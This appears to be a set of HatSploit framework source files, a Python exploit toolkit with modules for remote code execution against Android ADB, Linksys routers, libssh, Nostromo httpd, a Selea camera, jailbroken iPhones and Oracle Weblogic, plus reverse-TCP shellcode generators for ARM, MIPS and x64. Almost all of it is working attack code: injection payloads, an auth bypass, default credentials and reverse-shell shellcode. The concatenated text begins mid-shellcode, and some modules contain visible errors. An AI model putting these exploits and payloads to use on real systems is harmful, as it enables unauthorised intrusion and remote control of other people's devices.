b"\x19\x37\x01\xDF"
b"\x06\x1C\x08\xA1"
b"\x10\x22\x02\x37"
b"\x01\xDF\x3F\x27"
b"\x02\x21\x30\x1c"
b"\x01\xdf\x01\x39"
b"\xFB\xD5\x05\xA0"
b"\x92\x1a\x05\xb4"
b"\x69\x46\x0b\x27"
b"\x01\xDF\xC0\x46"
b"\x02\x00" + local_port + # "\x12\x34" struct sockaddr and port
+ local_host + # reverse ip address
b"\x2f\x73\x79\x73\x74\x65\x6d" # /system
b"\x2f\x62\x69\x6e" # /bin
b"\x2f\x73\x68\x00" # /sh\0
)
self.output_process("Generating payload...")
payload = self.generate(executable_format, 'armle', shellcode)
return payload
class HatSploitModule(Module, Handler, ADBClient, TCPClient):
details = {
'Name': "Android ADB Remote Code Execution",
'Module': "exploit/android/adb/remote_code_execution",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Remote Code Execution in Android ADB.",
'Dependencies': [''],
'Comments': [''],
'Platform': "android",
'Risk': "high"
}
payload = {
'Description': "Payload to use.",
'Value': "unix/generic/sh_reverse_tcp",
'Categories': None,
'Architectures': ['armle', 'aarch64', 'generic'],
'Platforms': ['android', 'linux', 'unix'],
'Types': None
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def adb_clean_up(self):
self.output_process("Stopping ADB server...")
if not self.stop_adb_server():
self.output_error("Failed to stop ADB server!")
def adb_execute_command(self, command):
command_output = self.execute_adb_command("shell", command)
return True, command_output
def adb_start_server(self):
self.output_process("Starting ADB server...")
if not self.start_adb_server():
self.output_error("Failed to start ADB server!")
return
def run(self):
remote_host, local_host, local_port = self.parse_options(self.options)
self.output_process("Checking ADB installation...")
if not self.check_adb_installation():
self.output_error("ADB is not installed!")
return
self.adb_start_server()
self.output_process(f"Exploiting {remote_host}...")
if not self.connect_adb_client(remote_host):
self.output_error("Exploit failed!")
self.clean_up()
return
if not self.check_connected(remote_host):
self.output_error("Exploit failed!")
self.clean_up()
return
self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
sender=self.adb_execute_command,
timeout=10)
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
details = {
'Name': "Linksys WVBR0 25 Remote Code Execution",
'Module': "exploit/unix/linksys/wvbr0_25_rce",
'Authors': ['Ivan Nikolsky (enty8080)', 'HeadlessZeke (headlesszeke)'],
'Description': "Remote Code Execution in Linksys WVBR0 25.",
'Dependencies': [''],
'Comments': [''],
'Platform': "unix",
'Risk': "high"
}
payload = {
'Description': "Payload to use.",
'Value': "unix/generic/netcat_reverse_tcp",
'Categories': None,
'Architectures': ['mipsle', 'mipsbe', 'generic'],
'Platforms': None,
'Types': None
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def execute_command(self, remote_host, remote_port, command):
payload = f"\"; {command} #"
self.http_request(method="GET",
host=remote_host,
port=remote_port,
headers={'User-Agent': payload})
def run(self):
remote_host, remote_port, local_host, local_port = self.parse_options(
self.options)
self.output_process(f"Exploiting {remote_host}...")
self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
sender=self.execute_command,
args=[remote_host, remote_port],
timeout=10)
class HatSploitPayload(Payload, HatVenom, TCPClient):
details = {
'Category': "stager",
'Name': "Linux mipsbe Shell Reverse TCP",
'Payload': "linux/mipsbe/shell_reverse_tcp",
'Authors': [
'Ivan Nikolsky (enty8080)'
],
'Description': "Shell reverse TCP payload for Linux mipsbe.",
'Dependencies': [
''
],
'Comments': [
''
],
'Architecture': "mipsbe",
'Platform': "linux",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
local_host, local_port = self.parse_options(self.options)
offsets = {
'lport': local_port,
'lhost1': self.ip_bytes(local_host)[:2],
'lhost2': self.ip_bytes(local_host)[2:]
}
self.output_process("Generating shellcode...")
shellcode = (
b"\x28\x04\xff\xff" # slti a0,zero,-1
b"\x24\x02\x0f\xa6" # li v0,4006
b"\x01\x09\x09\x0c" # syscall 0x42424
b"\x28\x04\x11\x11" # slti a0,zero,4369
b"\x24\x02\x0f\xa6" # li v0,4006
b"\x01\x09\x09\x0c" # syscall 0x42424
b"\x24\x0c\xff\xfd" # li t4,-3
b"\x01\x80\x20\x27" # nor a0,t4,zero
b"\x24\x02\x0f\xa6" # li v0,4006
b"\x01\x09\x09\x0c" # syscall 0x42424
b"\x24\x0c\xff\xfd" # li t4,-3
b"\x01\x80\x20\x27" # nor a0,t4,zero
b"\x01\x80\x28\x27" # nor a1,t4,zero
b"\x28\x06\xff\xff" # slti a2,zero,-1
b"\x24\x02\x10\x57" # li v0,4183
b"\x01\x09\x09\x0c" # syscall 0x42424
b"\x30\x44\xff\xff" # andi a0,v0,0xffff
b"\x24\x02\x0f\xc9" # li v0,4041
b"\x01\x09\x09\x0c" # syscall 0x42424
b"\x24\x02\x0f\xc9" # li v0,4041
b"\x01\x09\x09\x0c" # syscall 0x42424
b"\x3c\x05\x00\x02" # lui a1,0x2
b"\x34\xa5:lport:port:" # "\x7a\x69" # ori a1,a1,0x7a69
b"\xaf\xa5\xff\xf8" # sw a1,-8(sp)
b"\x3c\x05:lhost1:" # "\xc0\xa8" # lui a1,0xc0a8
b"\x34\xa5:lhost2:" # "\x01\x37" # ori a1,a1,0x137
b"\xaf\xa5\xff\xfc" # sw a1,-4(sp)
b"\x23\xa5\xff\xf8" # addi a1,sp,-8
b"\x24\x0c\xff\xef" # li t4,-17
b"\x01\x80\x30\x27" # nor a2,t4,zero
b"\x24\x02\x10\x4a" # li v0,4170
b"\x01\x09\x09\x0c" # syscall 0x42424
b"\x3c\x08\x2f\x2f" # lui t0,0x2f2f
b"\x35\x08\x62\x69" # ori t0,t0,0x6269
b"\xaf\xa8\xff\xec" # sw t0,-20(sp)
b"\x3c\x08\x6e\x2f" # lui t0,0x6e2f
b"\x35\x08\x73\x68" # ori t0,t0,0x7368
b"\xaf\xa8\xff\xf0" # sw t0,-16(sp)
b"\x28\x07\xff\xff" # slti a3,zero,-1
b"\xaf\xa7\xff\xf4" # sw a3,-12(sp)
b"\xaf\xa7\xff\xfc" # sw a3,-4(sp)
b"\x23\xa4\xff\xec" # addi a0,sp,-20
b"\x23\xa8\xff\xec" # addi t0,sp,-20
b"\xaf\xa8\xff\xf8" # sw t0,-8(sp)
b"\x23\xa5\xff\xf8" # addi a1,sp,-8
b"\x27\xbd\xff\xec" # addiu sp,sp,-20
b"\x28\x06\xff\xff" # slti a2,zero,-1
b"\x24\x02\x0f\xab" # li v0,4011
b"\x00\x90\x93\x4c" # syscall 0x2424d
)
self.output_process("Generating payload...")
payload = self.generate('elf', 'mipsbe', shellcode, offsets)
return payload
class HatSploitPayload(Payload, PayloadGenerator, TCPClient):
details = {
'Category': "stager",
'Name': "Linux mipsle Shell Reverse TCP",
'Payload': "linux/mipsle/shell_reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Shell reverse TCP payload for Linux mipsle.",
'Dependencies': [''],
'Comments': [''],
'Architecture': "mipsle",
'Platform': "linux",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Executable format.",
'Value': "elf",
'Type': None,
'Required': True
}
}
def run(self):
local_host, local_port, executable_format = self.parse_options(
self.options)
local_host = self.host_to_bytes(local_host)
local_port = self.port_to_bytes(local_port)
if executable_format not in self.formats.keys():
self.output_error("Invalid executable format!")
return
self.output_process("Generating shellcode...")
shellcode = (
b"\xff\xff\x04\x28" # slti a0,zero,-1
b"\xa6\x0f\x02\x24" # li v0,4006
b"\x0c\x09\x09\x01" # syscall 0x42424
b"\x11\x11\x04\x28" # slti a0,zero,4369
b"\xa6\x0f\x02\x24" # li v0,4006
b"\x0c\x09\x09\x01" # syscall 0x42424
b"\xfd\xff\x0c\x24" # li t4,-3
b"\x27\x20\x80\x01" # nor a0,t4,zero
b"\xa6\x0f\x02\x24" # li v0,4006
b"\x0c\x09\x09\x01" # syscall 0x42424
b"\xfd\xff\x0c\x24" # li t4,-3
b"\x27\x20\x80\x01" # nor a0,t4,zero
b"\x27\x28\x80\x01" # nor a1,t4,zero
b"\xff\xff\x06\x28" # slti a2,zero,-1
b"\x57\x10\x02\x24" # li v0,4183
b"\x0c\x09\x09\x01" # syscall 0x42424
b"\xff\xff\x44\x30" # andi a0,v0,0xffff
b"\xc9\x0f\x02\x24" # li v0,4041
b"\x0c\x09\x09\x01" # syscall 0x42424
b"\xc9\x0f\x02\x24" # li v0,4041
b"\x0c\x09\x09\x01" # syscall 0x42424
+ local_port + b"\x05\x3c" # "\x7a\x69" lui a1,0x697a
b"\x02\x00\xa5\x34" # ori a1,a1,0x2
b"\xf8\xff\xa5\xaf" # sw a1,-8(sp)
+ local_host[2:] + b"\x05\x3c" # "\x00\x01" lui a1,0x100
+ local_host[:2] + b"\xa5\x34" # "\x7f\x00" ori a1,a1,0x7f
b"\xfc\xff\xa5\xaf" # sw a1,-4(sp)
b"\xf8\xff\xa5\x23" # addi a1,sp,-8
b"\xef\xff\x0c\x24" # li t4,-17
b"\x27\x30\x80\x01" # nor a2,t4,zero
b"\x4a\x10\x02\x24" # li v0,4170
b"\x0c\x09\x09\x01" # syscall 0x42424
b"\x62\x69\x08\x3c" # lui t0,0x6962
b"\x2f\x2f\x08\x35" # ori t0,t0,0x2f2f
b"\xec\xff\xa8\xaf" # sw t0,-20(sp)
b"\x73\x68\x08\x3c" # lui t0,0x6873
b"\x6e\x2f\x08\x35" # ori t0,t0,0x2f6e
b"\xf0\xff\xa8\xaf" # sw t0,-16(sp)
b"\xff\xff\x07\x28" # slti a3,zero,-1
b"\xf4\xff\xa7\xaf" # sw a3,-12(sp)
b"\xfc\xff\xa7\xaf" # sw a3,-4(sp)
b"\xec\xff\xa4\x23" # addi a0,sp,-20
b"\xec\xff\xa8\x23" # addi t0,sp,-20
b"\xf8\xff\xa8\xaf" # sw t0,-8(sp)
b"\xf8\xff\xa5\x23" # addi a1,sp,-8
b"\xec\xff\xbd\x27" # addiu sp,sp,-20
b"\xff\xff\x06\x28" # slti a2,zero,-1
b"\xab\x0f\x02\x24" # li v0,4011
b"\x0c\x09\x09\x01" # syscall 0x42424
)
self.output_process("Generating payload...")
payload = self.generate(executable_format, 'mipsle', shellcode)
return payload
class HatSploitModule(Module, Handler, TCPClient):
buffer_size = 2048
client = None
details = {
'Name':
"SSH LibSSH Code Execution",
'Module':
"exploit/unix/ssh/libssh_code_execution",
'Authors':
['Ivan Nikolsky (enty8080)', 'Peter Winter-Smith (peterwintersmith)'],
'Description':
"SSH LibSSH unauthorized access Remote Code Execution.",
'Dependencies': ['paramiko'],
'Comments': [''],
'Platform':
"unix",
'Risk':
"medium"
}
payload = {
'Description': "Payload to use.",
'Value': "unix/generic/netcat_reverse_tcp",
'Categories': None,
'Architectures': None,
'Platforms': None,
'Types': None
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 2222,
'Type': "port",
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def obtain_banner(self, remote_host, remote_port):
try:
sock = socket.create_connection((remote_host, int(remote_port)))
sock.settimeout(5)
banner = sock.recv(self.buffer_size)
sock.close()
return banner.split(b'\n')[0].decode().strip()
except Exception:
return None
def check_vulnerable(self, remote_host, remote_port):
banner = self.obtain_banner(remote_host, remote_port)
if banner:
if any(version in banner
for version in ['libssh-0.6', 'libssh_0.6']):
return True
if any(version in banner
for version in ['libssh-0.7', 'libssh_0.7']):
if int(banner.split('.')[-1]) < 6:
return True
if any(version in banner
for version in ['libssh-0.8', 'libssh_0.8']):
if int(banner.split('.')[-1]) < 4:
return True
return False
@staticmethod
def execute_command(remote_host, remote_port, command):
sock = socket.socket()
sock.connect((remote_host, int(remote_port)))
message = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
transport.start_client()
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(message)
transport.open_session(timeout=5).exec_command(command)
def run(self):
remote_host, remote_port, local_host, local_port = self.parse_options(
self.options)
self.output_process(f"Exploiting {remote_host}...")
if not self.check_vulnerable(remote_host, remote_port):
self.output_error("Exploit failed!")
return
self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
sender=self.execute_command,
args=[remote_host, remote_port],
timeout=10)
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
details = {
'Name': "Nostromo Httpd Remote Code Execution",
'Module': "exploit/unix/nostromo/remote_code_execution",
'Authors': ['Ivan Nikolsky (enty8080)', 'sp0re (sp0re)'],
'Description': "Remote Code Execution in Nostromo Httpd.",
'Dependencies': [''],
'Comments': [''],
'Platform': "unix",
'Risk': "high"
}
payload = {
'Description': "Payload to use.",
'Value': "linux/x64/shell_reverse_tcp",
'Categories': None,
'Architectures': None,
'Platforms': None,
'Types': None
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def execute_command(self, remote_host, remote_port, command):
payload = ""
payload += "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n"
payload += "Content-Length: 1\r\n\r\necho\necho\n"
payload += f"{command} 2>&1"
self.tcp_request(host=remote_host, port=remote_port, data=payload)
def check_vulnerable(self, remote_host, remote_port):
response = self.http_request(method="HEAD",
host=remote_host,
port=remote_port,
path="/")
if response is not None:
if 'Server' in response.headers.keys():
server = response.headers['Server']
if int(server.split('.')[-1]) < 7:
return True
return False
def run(self):
remote_host, remote_port, local_host, local_port = self.parse_options(
self.options)
self.output_process(f"Exploiting {remote_host}...")
if not self.check_vulnerable(remote_host, remote_port):
self.output_error("Exploit failed!")
return
self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
sender=self.execute_command,
args=[remote_host, remote_port],
timeout=10)
class HatSploitPayload(Payload, PayloadGenerator, TCPClient):
details = {
'Category': "stager",
'Name': "Linux x64 Shell Reverse TCP",
'Payload': "linux/x64/shell_reverse_tcp",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description': "Shell reverse TCP payload for Linux x64.",
'Dependencies': [''],
'Comments': [''],
'Architecture': "x64",
'Platform': "linux",
'Risk': "high",
'Type': "reverse_tcp"
}
options = {
'LHOST': {
'Description': "Local host.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'LPORT': {
'Description': "Local port.",
'Value': 8888,
'Type': "port",
'Required': True
},
'FORMAT': {
'Description': "Executable format.",
'Value': "elf",
'Type': None,
'Required': True
}
}
def run(self):
local_host, local_port, executable_format = self.parse_options(
self.options)
local_host = self.host_to_bytes(local_host)
local_port = self.port_to_bytes(local_port)
if executable_format not in self.formats.keys():
self.output_error("Invalid executable format!")
return
self.output_process("Generating shellcode...")
shellcode = (
b"\x6a\x29" # pushq $0x29
b"\x58" # pop %rax
b"\x99" # cltd
b"\x6a\x02" # pushq $0x2
b"\x5f" # pop %rdi
b"\x6a\x01" # pushq $0x1
b"\x5e" # pop %rsi
b"\x0f\x05" # syscall
b"\x48\x97" # xchg %rax,%rdi
b"\x48\xb9\x02\x00" # movabs $0x100007fb3150002,%rcx
+ local_port + # port
+local_host + # ip
b"\x51" # push %rcx
b"\x48\x89\xe6" # mov %rsp,%rsi
b"\x6a\x10" # pushq $0x10
b"\x5a" # pop %rdx
b"\x6a\x2a" # pushq $0x2a
b"\x58" # pop %rax
b"\x0f\x05" # syscall
b"\x6a\x03" # pushq $0x3
b"\x5e" # pop %rsi
b"\x48\xff\xce" # dec %rsi
b"\x6a\x21" # pushq $0x21
b"\x58" # pop %rax
b"\x0f\x05" # syscall
b"\x75\xf6" # jne 27 <dup2_loop>
b"\x6a\x3b" # pushq $0x3b
b"\x58" # pop %rax
b"\x99" # cltd
b"\x48\xbb\x2f\x62\x69\x6e\x2f" # movabs $0x68732f6e69622f,%rbx
b"\x73\x68\x00" # [redacted]
b"\x53" # push %rbx
b"\x48\x89\xe7" # mov %rsp,%rdi
b"\x52" # push %rdx
b"\x57" # push %rdi
b"\x48\x89\xe6" # mov %rsp,%rsi
b"\x0f\x05" # syscall
)
self.output_process("Generating payload...")
payload = self.generate(executable_format, 'x64', shellcode)
return payload
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
details = {
'Name': "Selea ANPR Camera Authenticated RCE",
'Module': "exploit/unix/selea/anpr_authenticated_rce",
'Authors': ['Ivan Nikolsky (enty8080)', 'LiquidWorm (liquidworm)'],
'Description':
"Selea ANPR Camera authenticated remote code execution.",
'Dependencies': [''],
'Comments': [''],
'Platform': "unix",
'Risk': "high"
}
payload = {
'Description': "Payload to use.",
'Value': "unix/generic/netcat_reverse_tcp",
'Categories': None,
'Architectures': ['mipsle', 'mipsbe', 'generic'],
'Platforms': None,
'Types': None
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 81,
'Type': "port",
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
},
'USERNAME': {
'Description': "Username for authorization.",
'Value': "admin",
'Type': None,
'Required': True
},
'PASSWORD': {
'Description': "Password for authorization.",
'Value': None,
'Type': None,
'Required': True
}
}
def execute_command(self, remote_host, remote_port, username, password,
command):
auth_token = base64.b64encode(f"{username}:{password}".encode())
headers = {'Authorization': f"Basic {auth_token.decode()}"}
payload = f"/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\ $({command})&type=port&port=80"
self.http_request(method="GET",
host=remote_host,
port=remote_port,
path=payload,
headers=header)
def run(self):
remote_host, remote_port, username, password = self.parse_options(
self.options)
self.output_process(f"Exploiting {remote_host}...")
self.handle_session(
host=local_host,
port=local_port,
payload=self.payload,
sender=self.execute_command,
args=[remote_host, remote_port, username, password],
timeout=10)
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
details = {
'Name': "Linksys WAP54Gv3 debug Remote Code Execution",
'Module': "exploit/unix/linksys/wap54gv3_debug_rce",
'Authors': ['Ivan Nikolsky (enty8080)', 'Phil Purviance'],
'Description': "Remote Code Execution in Linksys WAP54Gv3.",
'Dependencies': [''],
'Comments': [''],
'Platform': "unix",
'Risk': "high"
}
payload = {
'Description': "Payload to use.",
'Value': "linux/mipsle/shell_reverse_tcp",
'Categories': None,
'Architectures': ['mipsle', 'mipsbe', 'generic'],
'Platforms': None,
'Types': None
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def execute_command(self, remote_host, remote_port, command):
payload = {"data1": command, "command": "ui_debug"}
self.http_request(method="POST",
host=remote_host,
port=remote_port,
path='/debug.cgi',
data=payload,
auth=("Gemtek", "gemtekswd"))
def check_vulnerable(self, remote_host, remote_port):
response = self.http_request(method="GET",
host=remote_host,
port=remote_port,
path="/debug.cgi",
auth=("Gemtek", "gemtekswd"))
if response is None or response.status_code != 200:
return False
def run(self):
remote_host, remote_port, local_host, local_port = self.parse_options(
self.options)
self.output_process(f"Exploiting {remote_host}...")
if not self.check_vulnerable(remote_host, remote_port):
self.output_error("Exploit failed!")
return
self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
sender=self.execute_command,
args=[remote_host, remote_port],
timeout=10)
class HatSploitModule(Module, Handler, TCPClient):
details = {
'Name': "iPhoneOS SSH Cydia.app Default Password",
'Module': "exploit/iphoneos/ssh/cydia_default_password",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description':
"Bypass iPhoneOS SSH authorization using Cydia.app default SSH password.",
'Dependencies': ['paramiko'],
'Comments': [''],
'Platform': "iphoneos",
'Risk': "medium"
}
payload = {
'Description': "Payload to use.",
'Value': "unix/generic/bash_reverse_tcp",
'Categories': None,
'Architectures': ['armle', 'aarch64', 'generic'],
'Platforms': ['iphoneos', 'linux', 'unix'],
'Types': None
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 22,
'Type': "port",
'Required': True
},
'USERNAME': {
'Description': "Shell username.",
'Value': "mobile",
'Type': None,
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def run(self):
remote_host, remote_port, username, local_host, local_port = self.parse_options(
self.options)
self.output_process(f"Exploiting {remote_host}...")
self.output_process(f"Logging as {username}...")
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(remote_host,
port=remote_port,
username=username,
password='******')
except Exception:
self.output_error("Exploit failed!")
return
self.output_success(f"Successfully logged as {username}!")
self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
sender=client.exec_command,
timeout=10)
client.close()
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
details = {
'Name': "Oracle Weblogic console RCE",
'Module': "exploit/unix/oracle/weblogic_console_rce",
'Authors': ['Ivan Nikolsky (enty8080)'],
'Description':
"Remote Code Execution in Oracle Weblogic <= 14.1.1.0.0.",
'Dependencies': [''],
'Comments': [''],
'Platform': "unix",
'Risk': "high"
}
payload = {
'Description': "Payload to use.",
'Value': "unix/generic/netcat_reverse_tcp",
'Categories': ['single'],
'Architectures': None,
'Platforms': None,
'Types': ['reverse_tcp']
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': None,
'Type': "port",
'Required': True
},
'SRVHOST': {
'Description': "Local host to listen on.",
'Value': TCPClient.get_local_host(),
'Type': "ip",
'Required': True
},
'SRVPORT': {
'Description': "Local port to listen on.",
'Value': 8888,
'Type': "port",
'Required': True
}
}
def execute_command(self, remote_host, remote_port, command):
path = "/console/images/%252E%252E%252Fconsole.portal"
payload = f"_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('{command}');\");"
headers = {
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded"
}
self.http_request(method="POST",
host=remote_host,
port=remote_port,
path=path,
data=payload)
def check_vulnerable(self, remote_host, remote_port):
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path="/console/images/%252E%252E%252Fconsole.portal")
if response is None or response.status_code != 200:
return False
def run(self):
remote_host, remote_port, local_host, local_port = self.parse_options(
self.options)
self.output_process(f"Exploiting {remote_host}...")
if not self.check_vulnerable(remote_host, remote_port):
self.output_error("Exploit failed!")
return
self.handle_session(host=local_host,
port=local_port,
payload=self.payload,
sender=self.execute_command,
args=[remote_host, remote_port],
timeout=10)